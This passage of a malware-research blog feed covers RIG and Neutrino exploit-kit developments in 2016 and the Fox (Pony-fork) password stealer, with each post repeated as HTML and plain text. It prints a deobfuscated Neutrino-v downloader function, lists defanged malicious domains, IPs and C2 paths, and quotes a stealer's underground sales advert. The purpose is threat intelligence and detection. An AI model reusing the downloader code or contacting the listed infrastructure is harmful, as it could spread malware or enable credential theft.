12: Neutrino-v flash ran into <a href="https://twitter.com/maciekkotowicz">Maciej</a> ‘s <a href="https://github.com/mak/ekdeco/tree/master/neutrino">Neutrino decoder</a></em> <br /><em>Note the pnw26 with no associated binary data, the rubbish and additionalInfo</em><br /><em><br /></em><em>A Sample : <a href="https://www.virustotal.com/file/607f6c3795f6e0dedaa93a2df73e7e1192dcc7d73992cff337b895da3cba5523/analysis/1475368673/">607f6c3795f6e0dedaa93a2df73e7e1192dcc7d73992cff337b895da3cba5523</a></em><br /><br /><br /><a href="https://1.bp.blogspot.com/-EeAtCX1vV88/V_Be6Ea28LI/AAAAAAAAGA4/BK5XQggK0Fwu9GtxZljwHZRhZLygwQriwCK4B/s1600/NeutrinoVBehav.png" imageanchor="1"><img alt="" height="86" src="https://1.bp.blogspot.com/-EeAtCX1vV88/V_Be6Ea28LI/AAAAAAAAGA4/BK5XQggK0Fwu9GtxZljwHZRhZLygwQriwCK4B/s640/NeutrinoVBehav.png" title="" width="640" /> </a><br /><em>Picture 13: Neutrino-v behavioral is a little different : drops name are not generated via the <a href="https://msdn.microsoft.com/en-us/library/w0azsy9b%28v=vs.84%29.aspx">GetTempName</a> api</em><br /><br /><pre class="prettyprint"><code class="language-js hljs "> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">k2</span><span class="hljs-params">(k)</span> {</span><br /> <span class="hljs-keyword">var</span> y = a(e + <span class="hljs-string">"."</span> + e + <span class="hljs-string">"Request.5.1"</span>);<br /> y.setProxy(n);<br /> y.open(<span class="hljs-string">"GET"</span>, k(<span class="hljs-number">1</span>), n);<br /> y.Option(n) = k(<span class="hljs-number">2</span>);<br /> y.send();<br /> <span class="hljs-keyword">if</span> (<span class="hljs-number">200</span> == y.status) <span class="hljs-keyword">return</span> Rf(y.responseText, k(n))<br /> };</code></pre><em>Neutrino-v ensuring Wscript will use the default proxy (most often when a proxy is configured it’s only for WinINet , WinHTTP proxy is not set and Wscript will try to connect directly and fail)</em><br /><em><br /></em>I believe this Neutrino variant is in action in only one infection chain <em>(If you think this is inaccurate, i’d love to hear about it)</em><br /><a href="https://3.bp.blogspot.com/-ZSpzYtnkfFo/V_BYumU2MbI/AAAAAAAAGAc/JZ7M2zDcJGkXX03femNvqchbej_ojE4ywCK4B/s1600/2016-10-02_01h43_26.png" imageanchor="1"><img alt="" src="https://3.bp.blogspot.com/-ZSpzYtnkfFo/V_BYumU2MbI/AAAAAAAAGAc/JZ7M2zDcJGkXX03femNvqchbej_ojE4ywCK4B/s1600/2016-10-02_01h43_26.png" title="" /></a> <br /><em>Picture 14: Neutrino-v seems to be used by only one actor to spread Cerber 0079x</em><br /><blockquote>The actor behind this chain is the same as the one featured in the Malwarebytes <a href="https://blog.malwarebytes.com/threat-analysis/exploits-threat-analysis/2016/08/neutrino-ek-more-flash-trickery/">Neutrino EK: more Flash trickery</a> post.</blockquote><h2 id="empire-pack"><strong>Empire Pack:</strong></h2>Coincidentally a new Exploit Kit is being talked about underground : Empire Pack. Private, not advertised.<br /><a href="https://3.bp.blogspot.com/-_2D_cL-mfzo/V92nyxIMTmI/AAAAAAAAF8U/FR3_MZ9bGfUyKNUf3hG4he9KkWDqFJwRgCK4B/s1600/2016-09-17_21h29_40.png" imageanchor="1"><img alt="" src="https://3.bp.blogspot.com/-_2D_cL-mfzo/V92nyxIMTmI/AAAAAAAAF8U/FR3_MZ9bGfUyKNUf3hG4he9KkWDqFJwRgCK4B/s1600/2016-09-17_21h29_40.png" title="" /> </a><br /><em>Picture 15: King of Loads - Empire Pack Panel</em><br /><em><br /></em>Some might feel this interface quite familiar…A look a the favicon will give you a hint<br /><a href="https://4.bp.blogspot.com/-Njh6yoOf9Qk/V92p_6YpyuI/AAAAAAAAF8s/MN3x4WrLLwURaq7FVm5CDfqtfcNW7yO_ACK4B/s1600/2016-09-17_21h39_30.png" imageanchor="1"><img alt="" src="https://4.bp.blogspot.com/-Njh6yoOf9Qk/V92p_6YpyuI/AAAAAAAAF8s/MN3x4WrLLwURaq7FVm5CDfqtfcNW7yO_ACK4B/s1600/2016-09-17_21h39_30.png" title="" /> </a><br /><em>Picture 16: RIG EK favicon on Empire Pack panel</em><br /><em><br /></em><a href="https://4.bp.blogspot.com/-_ZKFpZ3Gvtk/V92oN2Chn5I/AAAAAAAAF8c/OZQWWQsWO8cB4Y0yDYKKM-PX4bLZ3hlhQCK4B/s1600/2016-09-17_21h31_56.png" imageanchor="1"><img alt="" src="https://4.bp.blogspot.com/-_ZKFpZ3Gvtk/V92oN2Chn5I/AAAAAAAAF8c/OZQWWQsWO8cB4Y0yDYKKM-PX4bLZ3hlhQCK4B/s1600/2016-09-17_21h31_56.png" title="" /> </a><br /><em>Picture 17: RIG Panel</em><br /><em><br /></em>It seems Empire Pack project was thought upon <a href="http://malware.dontneedcoffee.com/2016/06/is-it-end-of-angler.html">Angler EK</a> disappearance and launched around the 14th of August 2016.<br /><blockquote>[Speculation] <br />I think this launch could be related to the first wave of switch to RIG that occurred around that time. I think, Empire Pack is a RIG instance managed by a Reseller/Load Seller with strong underground connections. <br />[/Speculation]</blockquote>RIG-v is a “vip” version of RIG. Now how exactly those three elements <em>(RIG, RIG-v, Empire Pack)</em> are overlapping, <strike>I don’t know.</strike> I am aware of 3 variants of the API to RIG<br /><ul><li>api.php : historical RIG </li><li>api3.php : RIG with internal TDS [ 2016-10-08 : This is Empire Pack. Appears to be using also remote_api after this post went live. I flag it as RIG-E ]</li><li>remote_api.php : RIG-v</li></ul><div><strike>But Empire Pack might be api3, remote_api, or a bit of both of them</strike>.<br /><br />By the way RIG has also (as Nuclear and Angler endup doing) added IP Whitelisting on API calls to avoid easy EK tracking from there. :-" (Only whitelisted IP - from declared redirector or external TDS - can query the API to get the current landing) <br /><h3 id="conclusion"><strong>Conclusion</strong></h3>Let’s just conclude this post with statistics pages of two Neutrino threads<br /><a href="https://3.bp.blogspot.com/-MefTxJDWJ3M/V92uhgJZ4BI/AAAAAAAAF9A/GdQmuZUQeV0-t_S2DwE6ZgKY-nuZcDRBQCK4B/s1600/image.png" imageanchor="1"><img alt="" src="https://3.bp.blogspot.com/-MefTxJDWJ3M/V92uhgJZ4BI/AAAAAAAAF9A/GdQmuZUQeV0-t_S2DwE6ZgKY-nuZcDRBQCK4B/s1600/image.png" title="" /> </a><br /><em>Picture 18: Neutrino stats - Aus focused thread - 2016-07-15</em><br /><a href="https://4.bp.blogspot.com/-Twnbi-pDDYM/V92vHBhEmiI/AAAAAAAAF9U/UzDeXNlxQmMpWVj7iFZIx9Yj_hm6F_wEwCK4B/s1600/unnamed%2B%25281%2529.png" imageanchor="1"><img alt="" src="https://4.bp.blogspot.com/-Twnbi-pDDYM/V92vHBhEmiI/AAAAAAAAF9U/UzDeXNlxQmMpWVj7iFZIx9Yj_hm6F_wEwCK4B/s1600/unnamed%2B%25281%2529.png" title="" /></a><br /><em>Picture 19: Neutrino stats on 1 Million traffic - 2016-06-09</em><br /><br /><br /><blockquote><blockquote class="tr_bq">“<em>We will be known forever by the tracks we leave</em>”<br />Santee Sioux Tribe</blockquote></blockquote><br /><h3 id="some-iocs"></h3><h3 id="some-iocs">Some IOCs</h3><table border="1" cellpadding="2" cellspacing="2"><thead><tr><th align="left">Date</th><th align="left">Domain</th><th align="left">IP</th><th align="left">Comment</th></tr></thead><tbody><tr><td align="left">2016-10-01</td><td align="left">szsiul.bluekill[.]top</td><td align="left">137.74.55.6</td><td align="left">Neutrino-v</td></tr><tr><td align="left">2016-10-01</td><td align="left">twqivrisa.pinkargue[.]top</td><td align="left">137.74.55.7</td><td align="left">Neutrino-v</td></tr><tr><td align="left">2016-10-01</td><td align="left">u0e1.wzpub4q7q[.]top</td><td align="left">185.117.73.80</td><td align="left">RIG-E (Empire Pack)</td></tr><tr><td align="left">2016-10-01</td><td align="left">adspixel[.]site</td><td align="left">45.63.100.224</td><td align="left">NeutrAds Redirector</td></tr><tr><td align="left">2016-09-30</td><td align="left">re.flighteducationfinancecompany[.]com</td><td align="left">109.234.37.218</td><td align="left">RIG-v</td></tr><tr><td align="left">2016-09-28</td><td align="left">add.alislameyah[.]org</td><td align="left">193.124.117.13</td><td align="left">RIG-v</td></tr><tr><td align="left">2016-09-28</td><td align="left">lovesdeals[.]ml</td><td align="left">198.199.124.116</td><td align="left">RIG-v</td></tr><tr><td align="left">2016-09-27</td><td align="left">dns.helicopterdog[.]com</td><td align="left">195.133.201.23</td><td align="left">RIG</td></tr><tr><td align="left">2016-09-26</td><td align="left">sv.flickscoop[.]net</td><td align="left">195.133.201.41</td><td align="left">RIG</td></tr><tr><td align="left">2016-09-26</td><td align="left">red.truewestcarpetcare[.]com</td><td align="left">195.133.201.11</td><td align="left">RIG-v</td></tr><tr><td align="left">2016-09-26</td><td align="left">oitutn.yellowcarry[.]top</td><td align="left">78.46.167.130</td><td align="left">Neutrino</td></tr></tbody></table><h3 id="acknowledgement">Acknowledgements</h3>Thanks <a href="https://twitter.com/malc0de"><i class="icon-twitter"></i>Malc0de</a>, <a href="https://twitter.com/jspchc"><i class="icon-twitter"></i>Joseph C Chen</a> <em>(<a href="http://blog.trendmicro.com/">Trendmicro</a>)</em>, <a href="https://twitter.com/node5"><i class="icon-twitter"></i>Will Metcalf</a> <em>( <a href="https://www.proofpoint.com/us/threat-insight">EmergingThreat/Proofpoint</a>)</em> for their inputs and help on multiple aspect of this post.<br /><h3 id="edits">Edits</h3>2016-10-03 :<br />Removed limitation to KOR and TWN for Neutrino-v use by NeutrAds as <a href="http://blog.trendmicro.com/">Trendmicro</a> informed me they are now seeing them in other Geos.<br />Added explanation about the IP whitelisting on RIG API (it was not clear)<br />2016-10-08 :<br />Updated with gained information on Empire Pack<br />2016-11-01 :<br />RIG standard is now also using the pattern introduces past week by RIG-v. It's now in version 4.<br /><a href="https://twitter.com/kafeine/status/790482708870864896">https://twitter.com/kafeine/status/790482708870864896</a><br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-3rGBEBvbx20/WCyy1SkLqPI/AAAAAAAAGCM/qivnSdnXzPIEoqx6bdqWrSK7rQIEoTI1QCK4B/s1600/2016-11-16_19h22_08.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://3.bp.blogspot.com/-3rGBEBvbx20/WCyy1SkLqPI/AAAAAAAAGCM/qivnSdnXzPIEoqx6bdqWrSK7rQIEoTI1QCK4B/s1600/2016-11-16_19h22_08.png" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">RIG panel</td></tr></tbody></table>The only instance of RIG using old pattern is Empire Pack (which previously could be guessed by domains pattern)<br />2016-11-18 : Empire (RIG-E) is now using RC4 encoding as well. (still on old pattern and landing)<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-8tm21UaMsAw/WDLH81v4jYI/AAAAAAAAGCY/AVyDTv0lG_Yk1aEc6avBdfhrEWd8Y4sCQCLcB/s1600/2016-11-21_10h05_25.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://4.bp.blogspot.com/-8tm21UaMsAw/WDLH81v4jYI/AAAAAAAAGCY/AVyDTv0lG_Yk1aEc6avBdfhrEWd8Y4sCQCLcB/s1600/2016-11-21_10h05_25.png" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">RIG-E Behavioral</td></tr></tbody></table>2016-12-03<br />RIG-v has increased filtering on IP ranges and added a pre-landing to filter out non IE traffic.<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://i.imgur.com/Tn3n4Cl.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://i.imgur.com/Tn3n4Cl.png" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">2016-12-03 RIG-v Pre-landing</td></tr></tbody></table><br /><br /><h3 id="read-more">Read More</h3><a href="https://www.trustwave.com/Resources/SpiderLabs-Blog/RIG-s-Facelift/">RIG’s Facelift</a> - 2016-09-30 - SpiderLabs <br /><a href="http://malware.dontneedcoffee.com/2016/06/is-it-end-of-angler.html">Is it the End of Angler ?</a> - 2016-06-11 <br /><a href="http://malware.dontneedcoffee.com/2014/11/neutrino-come-back.html">Neutrino : The come back ! (or Job314 the Alter EK)</a> - 2014-11-01 <br /><a href="http://malware.dontneedcoffee.com/2013/03/hello-neutrino-just-one-more-exploit-kit.html">Hello Neutrino !</a> - 2013-06-07<br /><a href="http://malware.dontneedcoffee.com/2012/12/eyeglanceru.html">The path to infection - Eye glance at the first line of “Russian Underground”</a> - 2012-12-05</div>Kafeinehttps://twitter.com/kafeine Around the middle of August many infection chains transitioned to RIG with more geo-focused bankers and less CryptXXX (CryptMic) Ransomware. Picture 1: Select Drive-by landscape - Middle of August 2016 vs Middle of July 2016RIG += internal TDS :Trying to understand that move, I suspected and confirmed the presence of an internal TDS (Traffic Distribution System) inside RIG Exploit Kit [Edit 2016-10-08 : It seems this functionality is limited to Empire Pack version of RIG]I believe this feature appeared in the EK market with Blackhole (if you are aware of a TDS integrated earlier directly in an EK please tell me) Picture2: Blackhole - 2012 - Internal TDS illustrationbut disappeared from the market with the end of Nuclear Pack Picture3: Nuclear Pack - 2016-03-09 - Internal TDS illustrationand Angler EK Picture 4 : Angler EK - Internal TDS illustrationThis is a key feature for load seller. It is making their day to day work with traffic provider far easier . It allows Exploit Kit operator to attach multiple payloads to a unique thread. The drop will be conditioned by Geo (and/or OS settings) of the victim.Obviously you can achieve the same result with any other exploit kit…but things are a little more difficult. You have to create one Exploit Kit thread per payload, use an external TDS (like Keitaro/Sutra/BlackHat TDS/SimpleTDS/BossTDS, etc…) and from that TDS, point the traffic to the correct Exploit Kit thread (or, if you buy traffic, tell your traffic provider where to send traffic for each targeted country). Picture 5: A Sutra TDS in action in 2012 - cf The path to infection RIG += RC4 encryption, dll drop and CVE-2016-0189:Around 2016-09-12 a variation of RIG (which i flag as RIG-v in my systems) appeared.A slightly different landing obfuscation, RC4 encoding, Neutrino-ish behavioral and added CVE-2016-0189 Picture 6: RIG-v Neutrino-ish behavioral captured by Brad Spengler’s modified cuckoo Picture 7: CVE-2016-0189 from RIG-v after 3 step de-obfuscation pass.Neutrino waves goodbye ?On 2016-09-09 on underground it has been reported a message on Jabber from the Neutrino seller account :“we are closed. no new rents, no extends more”This explains a lot. Here are some of my last Neutrino pass for past month. Picture 8: Some Neutrino passes for past month and associated taxonomy tags in MispAs you can see several actors were still using it…Now here is what i get for the past days : Picture 9: Past days in DriveBy land Not shown here, Magnitude is still around, mostly striking in AsiaDay after day, each of them transitioned to RIG or “RIG-v”. Around the 22nd of September 2016 the Neutrino advert and banner disappeared from underground. Picture 10: Last banner for Neutrino as of 2016-09-16Are we witnessing the end of Neutrino Exploit Kit ? To some degree. In fact it looks more like Neutrino is going in full “Private” mode “a la” Magnitude.Side reminder : Neutrino disappeared from march 2014 till november 2014A Neutrino VariantSeveral weeks ago, Trendmicro (Thanks!!) made me aware of a malvertising chain they spotted in Korea and Taiwan involving Neutrino. Picture 11: Neutrino-v pass on the 2016-09-21Upon replay I noticed that this Neutrino was somewhat different. Smoother CVE-2016-4117, more randomization in the landing, slightly modified flash bundle of exploits Picture 12: Neutrino-v flash ran into Maciej ‘s Neutrino decoder Note the pnw26 with no associated binary data, the rubbish and additionalInfoA Sample : 607f6c3795f6e0dedaa93a2df73e7e1192dcc7d73992cff337b895da3cba5523 Picture 13: Neutrino-v behavioral is a little different : drops name are not generated via the GetTempName api function k2(k) { var y = a(e + "." + e + "Request.5.1"); y.setProxy(n); y.open("GET", k(1), n); y.Option(n) = k(2); y.send(); if (200 == y.status) return Rf(y.responseText, k(n)) };Neutrino-v ensuring Wscript will use the default proxy (most often when a proxy is configured it’s only for WinINet , WinHTTP proxy is not set and Wscript will try to connect directly and fail)I believe this Neutrino variant is in action in only one infection chain (If you think this is inaccurate, i’d love to hear about it) Picture 14: Neutrino-v seems to be used by only one actor to spread Cerber 0079xThe actor behind this chain is the same as the one featured in the Malwarebytes Neutrino EK: more Flash trickery post.Empire Pack:Coincidentally a new Exploit Kit is being talked about underground : Empire Pack. Private, not advertised. Picture 15: King of Loads - Empire Pack PanelSome might feel this interface quite familiar…A look a the favicon will give you a hint Picture 16: RIG EK favicon on Empire Pack panel Picture 17: RIG PanelIt seems Empire Pack project was thought upon Angler EK disappearance and launched around the 14th of August 2016.[Speculation] I think this launch could be related to the first wave of switch to RIG that occurred around that time. I think, Empire Pack is a RIG instance managed by a Reseller/Load Seller with strong underground connections. [/Speculation]RIG-v is a “vip” version of RIG. Now how exactly those three elements (RIG, RIG-v, Empire Pack) are overlapping, I don’t know. I am aware of 3 variants of the API to RIGapi.php : historical RIG api3.php : RIG with internal TDS [ 2016-10-08 : This is Empire Pack. Appears to be using also remote_api after this post went live. I flag it as RIG-E ]remote_api.php : RIG-vBut Empire Pack might be api3, remote_api, or a bit of both of them.By the way RIG has also (as Nuclear and Angler endup doing) added IP Whitelisting on API calls to avoid easy EK tracking from there. :-" (Only whitelisted IP - from declared redirector or external TDS - can query the API to get the current landing) ConclusionLet’s just conclude this post with statistics pages of two Neutrino threads Picture 18: Neutrino stats - Aus focused thread - 2016-07-15Picture 19: Neutrino stats on 1 Million traffic - 2016-06-09“We will be known forever by the tracks we leave”Santee Sioux TribeSome IOCsDateDomainIPComment2016-10-01szsiul.bluekill[.]top137.74.55.6Neutrino-v2016-10-01twqivrisa.pinkargue[.]top137.74.55.7Neutrino-v2016-10-01u0e1.wzpub4q7q[.]top185.117.73.80RIG-E (Empire Pack)2016-10-01adspixel[.]site45.63.100.224NeutrAds Redirector2016-09-30re.flighteducationfinancecompany[.]com109.234.37.218RIG-v2016-09-28add.alislameyah[.]org193.124.117.13RIG-v2016-09-28lovesdeals[.]ml198.199.124.116RIG-v2016-09-27dns.helicopterdog[.]com195.133.201.23RIG2016-09-26sv.flickscoop[.]net195.133.201.41RIG2016-09-26red.truewestcarpetcare[.]com195.133.201.11RIG-v2016-09-26oitutn.yellowcarry[.]top78.46.167.130NeutrinoAcknowledgementsThanks Malc0de, Joseph C Chen (Trendmicro), Will Metcalf ( EmergingThreat/Proofpoint) for their inputs and help on multiple aspect of this post.Edits2016-10-03 :Removed limitation to KOR and TWN for Neutrino-v use by NeutrAds as Trendmicro informed me they are now seeing them in other Geos.Added explanation about the IP whitelisting on RIG API (it was not clear)2016-10-08 :Updated with gained information on Empire Pack2016-11-01 :RIG standard is now also using the pattern introduces past week by RIG-v. It's now in version 4.https://twitter.com/kafeine/status/790482708870864896RIG panelThe only instance of RIG using old pattern is Empire Pack (which previously could be guessed by domains pattern)2016-11-18 : Empire (RIG-E) is now using RC4 encoding as well. (still on old pattern and landing)RIG-E Behavioral2016-12-03RIG-v has increased filtering on IP ranges and added a pre-landing to filter out non IE traffic.2016-12-03 RIG-v Pre-landingRead MoreRIG’s Facelift - 2016-09-30 - SpiderLabs Is it the End of Angler ? - 2016-06-11 Neutrino : The come back ! (or Job314 the Alter EK) - 2014-11-01 Hello Neutrino ! - 2013-06-07The path to infection - Eye glance at the first line of “Russian Underground” - 2012-12-05Fox stealer: another Pony Fork2016-09-26T13:12:00+02:002016-09-26T13:12:00+02:00https://malware.dontneedcoffee.com/2016/09/fox-stealer-another-pony-fork<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-Y9KYKectp3M/V-j76m4hizI/AAAAAAAAF_A/sl4dWC-Top0VzR08nFxnAi-fhyrCYmNhgCK4B/s1600/2016-09-26_11h43_32.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="186" src="https://2.bp.blogspot.com/-Y9KYKectp3M/V-j76m4hizI/AAAAAAAAF_A/sl4dWC-Top0VzR08nFxnAi-fhyrCYmNhgCK4B/s200/2016-09-26_11h43_32.png" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><span style="font-size: xx-small;">Gift for SweetTail-Fox-mlp</span><br /><span style="font-size: xx-small;"> by <a href="http://mad-n-monstrous.deviantart.com/art/Gift-for-SweetTail-Fox-mlp-554747829">Mad-N-Monstrous</a></span></td></tr></tbody></table><div style="text-align: center;"><br /></div><br />Small data drop about another <a href="http://malware.dontneedcoffee.com/2012/06/inside-pony-17.html">Pony</a> fork : Fox stealer.<br />First sample of this malware I saw was at beginning of September 2016 thanks to <a href="https://twitter.com/malc0de">Malc0de</a>. After figuring out the panel name and to which advert it was tied we were referring to it as PonyForx.<br /><br /><b><u>Advert :</u></b><br />2016-08-11 - Sold underground by a user going with nickname "Cronbot"<br /><br />--------<br /><span style="color: #666666;">Стилер паролей и нетолько - Fox v1.0</span><br /><span style="color: #666666;"><br /></span><span style="color: #666666;">Мы выпускаем продукт на продажу. Уже проходит финальная стадия тестирования данного продукта.</span><br /><span style="color: #666666;"><br /></span><span style="color: #666666;">О продукте : </span><br /><span style="color: #666666;">1. Умеет все что умеет пони. + добавлен новый софт.</span><br /><span style="color: #666666;">2. Актуален на 2016 год.</span><br /><span style="color: #666666;">3. Написан на С++ без дополнительных библиотек.</span><br /><span style="color: #666666;">4. Админка от пони.</span><br /><span style="color: #666666;"><br /></span><span style="color: #666666;">Условия : </span><br /><span style="color: #666666;">1. Только аренда.</span><br /><span style="color: #666666;">2. Распространяется в виде EXE и DLL.</span><br /><span style="color: #666666;">3. Исходники продавать не будем.</span><br /><span style="color: #666666;"><br /></span><span style="color: #666666;">Аренда 250$ в месяц.</span><br /><span style="color: #666666;">Исходники 2000$ разово.</span><br /><div><br /></div><div>----Translated by <span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">Jack Urban</span> : ----</div><div><br /></div><div><div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;"><div><div><div><div><div><div><div><div><div><div><div>Password stealer and more - Fox v.1.0<br /></div>We are releasing the product for general sale. Final stage of testing for this product is already underway.<br /></div>About the product:</div>1. Is able to do everything that pony does. + new software has been added.</div>2. Relevant for 2016.</div>3. Written in C++ without additional libraries.</div>4. Admin from pony.<br /></div>Conditions:</div>1. For rent only.</div>2. Distributed as an EXE and DLL.</div>3. We will not be selling the source.<br /></div>Rent is $250 a month.</div><span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">Originals are a 2000$ one time fee. </span><br /><span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;"><br /></span></div><div>--------</div><br />It's being loaded (<span style="font-size: x-small;">with Locky Affid 13</span>) by the Godzilla from <a href="http://pastebin.com/raw/uKLhTbLs">ScriptJS</a> (<span style="font-size: x-small;">aka AfraidGate</span>) group .<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-VD1QAoNgZAM/V-jzyVMBPEI/AAAAAAAAF-o/slcFqcV8vjkv9htTqAP339I5ymr0NC9mgCK4B/s1600/2016-09-26_11h08_09.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://1.bp.blogspot.com/-VD1QAoNgZAM/V-jzyVMBPEI/AAAAAAAAF-o/slcFqcV8vjkv9htTqAP339I5ymr0NC9mgCK4B/s1600/2016-09-26_11h08_09.png" /></a></td></tr><tr><td class="tr-caption" style="font-size: 12.8px;">MISP taxonomy tags reflecting ScriptJS activity in the last months</td></tr></tbody></table>(note : <i>it's not the first time this group is pushing a stealer, they were dropping Pony with their Necurs between August and December 2015 [1]</i> )<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-wgkgosIIVfo/V-jvAJJPWrI/AAAAAAAAF-c/BYhe7wpx5QAfcJv2m3n7HgwnP4n27qluwCK4B/s1600/2016-09-26_10h44_28.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="386" src="https://2.bp.blogspot.com/-wgkgosIIVfo/V-jvAJJPWrI/AAAAAAAAF-c/BYhe7wpx5QAfcJv2m3n7HgwnP4n27qluwCK4B/s640/2016-09-26_10h44_28.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">2016-09-26 - ScriptJS infection chain into Neutrino into Godzilla loader into PonyForx and Locky Affid 13<br />Here we can see the browsing history of the VM being sent to PonyForx (Fox stealer) C2</td></tr></tbody></table><div style="text-align: center;"><br /></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-e_-jFKz0NSY/V-j9MPME2dI/AAAAAAAAF_M/tzQq4AqJtaE_mL9PFWWOS-PzXcBlp6T0gCK4B/s1600/2016-09-26_11h48_17.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="247" src="https://3.bp.blogspot.com/-e_-jFKz0NSY/V-j9MPME2dI/AAAAAAAAF_M/tzQq4AqJtaE_mL9PFWWOS-PzXcBlp6T0gCK4B/s320/2016-09-26_11h48_17.png" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Fox stealer (PonyForx) fingerprint in Cuckoo</td></tr></tbody></table><u><br /></u><u>Sample :</u><br /><div><a href="https://www.virustotal.com/en/file/cca1f8ba0be872ec86755e3defbb23c8fe4a272a6b4f7ec651302c5cddc5e183/analysis/">cca1f8ba0be872ec86755e3defbb23c8fe4a272a6b4f7ec651302c5cddc5e183</a></div><div><div>Associated C2:<br />blognetoo[.]com/find.php/hello<br />blognetoo[.]com/find.php/data</div><div>blognetoo[.]com|104.36.83.52</div><div>blognetoo[.]com|45.59.114.126</div></div><div>Caught by ET rule :</div><div>2821590 || ETPRO TROJAN Win32.Pony Variant Checkin<br /><br />[1] ScriptJS's Pony :<br />master.districtpomade[.]com|188.166.54.203 - 2015-08-15 Pony C2 from ScriptJS<br />js.travelany[.]com[.]ve|185.80.53.18 - 2015-12-10 Pony C2 from ScriptJS<br /><br /><b><u>Read More :</u></b> </div><div><span style="color: #0000ee;"><u><a href="http://pastebin.com/raw/uKLhTbLs">http://pastebin.com/raw/uKLhTbLs</a></u></span> few bits about ScriptJS</div><div><a href="http://malware.dontneedcoffee.com/2012/06/inside-pony-17.html">Inside Pony 1.7 / Fareit C&C - Botnet Control Panel</a> - 2012-06-27</div><div><a href="http://www.xylibox.com/2013/05/pony-19-win32fareit.html">Pony 1.9 (Win32/Fareit)</a> - 2013-05-23 - <a href="https://twitter.com/xylit0l">Xylitol</a></div>Kafeinehttps://twitter.com/kafeineGift for SweetTail-Fox-mlp by Mad-N-MonstrousSmall data drop about another Pony fork : Fox stealer.First sample of this malware I saw was at beginning of September 2016 thanks to Malc0de. After figuring out the panel name and to which advert it was tied we were referring to it as PonyForx.Advert :2016-08-11 - Sold underground by a user going with nickname "Cronbot"--------Стилер паролей и нетолько - Fox v1.0Мы выпускаем продукт на продажу. Уже проходит финальная стадия тестирования данного продукта.О продукте : 1. Умеет все что умеет пони. + добавлен новый софт.2. Актуален на 2016 год.3. Написан на С++ без дополнительных библиотек.4. Админка от пони.Условия : 1. Только аренда.2. Распространяется в виде EXE и DLL.3. Исходники продавать не будем.Аренда 250$ в месяц.Исходники 2000$ разово.----Translated by Jack Urban : ----Password stealer and more - Fox v.1.0We are releasing the product for general sale. Final stage of testing for this product is already underway.About the product:1. Is able to do everything that pony does. + new software has been added.2. Relevant for 2016.3. Written in C++ without additional libraries.4. Admin from pony.Conditions:1. For rent only.2. Distributed as an EXE and DLL.3. We will not be selling the source.Rent is $250 a month.Originals are a 2000$ one time fee. --------It's being loaded (with Locky Affid 13) by the Godzilla from ScriptJS (aka AfraidGate) group .MISP taxonomy tags reflecting ScriptJS activity in the last months(note : it's not the first time this group is pushing a stealer, they were dropping Pony with their Necurs between August and December 2015 [1] )2016-09-26 - ScriptJS infection chain into Neutrino into Godzilla loader into PonyForx and Locky Affid 13Here we can see the browsing history of the VM being sent to PonyForx (Fox stealer) C2Fox stealer (PonyForx) fingerprint in CuckooSample :cca1f8ba0be872ec86755e3defbb23c8fe4a272a6b4f7ec651302c5cddc5e183Associated C2:blognetoo[.]com/find.php/helloblognetoo[.]com/find.php/datablognetoo[.]com|104.36.83.52blognetoo[.]com|45.59.114.126Caught by ET rule :2821590 || ETPRO TROJAN Win32.Pony Variant Checkin[1] ScriptJS's Pony :master.districtpomade[.]com|188.166.54.203 - 2015-08-15 Pony C2 from ScriptJSjs.travelany[.]com[.]ve|185.80.53.18 - 2015-12-10 Pony C2 from ScriptJSRead More : http://pastebin.com/raw/uKLhTbLs few bits about ScriptJSInside Pony 1.7 / Fareit C&C - Botnet Control Panel - 2012-06-27Pony 1.9 (Win32/Fareit) - 2013-05-23 - Xylitol